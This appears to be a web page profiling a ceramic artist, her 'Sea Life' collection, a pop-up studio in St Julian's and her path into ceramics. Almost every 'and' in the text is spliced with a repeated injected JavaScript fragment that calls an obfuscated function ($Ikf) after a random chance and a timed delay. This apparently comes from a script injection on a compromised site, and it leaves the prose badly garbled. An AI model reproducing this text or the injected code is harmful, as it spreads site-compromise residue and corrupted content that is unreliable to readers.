During The Trail she will be showing her ‘Sea Life’ collection andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and working on other pieces as people pass through her pop-up open studio at the Two Buoys Art Studio andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Restaurant in St Julian’s.

Robbie creates decorative pieces, wall hangings andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and sculptures. Her inspirations come from nature itself. She has always been fascinated by the complex andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and beautiful natural structures andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and textures found in plants, bark, seed pods, coral andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and shells. Nature is an unfailing source of inspiration andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and she loves to explore andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and capture it in her work. She uses a range of handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and-building techniques; pinching, coils andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and slabs, in a variety of different kinds of clay.

“Working with clay is something magical” she explains. “It’s the feeling on my handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ands whilst modelling, the transformation of the material that starts to take shape, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and the idea of creating something unique through which I represent myself, my thoughts andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and emotions. My aim is to transmit them, to balance perfection with imperfection andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and find the beauty in both”.

“My passion for art started at an early age. Art shops were my favourite places to be. I could get lost amongst the colours, pencils, books andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and other supplies. I realised that I had a natural inclination to capture the smallest of details of anything around me. Over the years I have found it essential to keep my passion alive. For many years I have worked in creative roles in  the commercial sector, including graphic design, in search of my niche, but felt that something was missing. In 2012 while living in Rome, I attended a ceramics masterclass. It was then that everything clicked into place andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and I discovered my artistic medium, one that allows me to fully capture andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and express myself creatively. I left my career andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and dedicated myself solely to ceramics, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and fell in love with the versatility of the clay”.
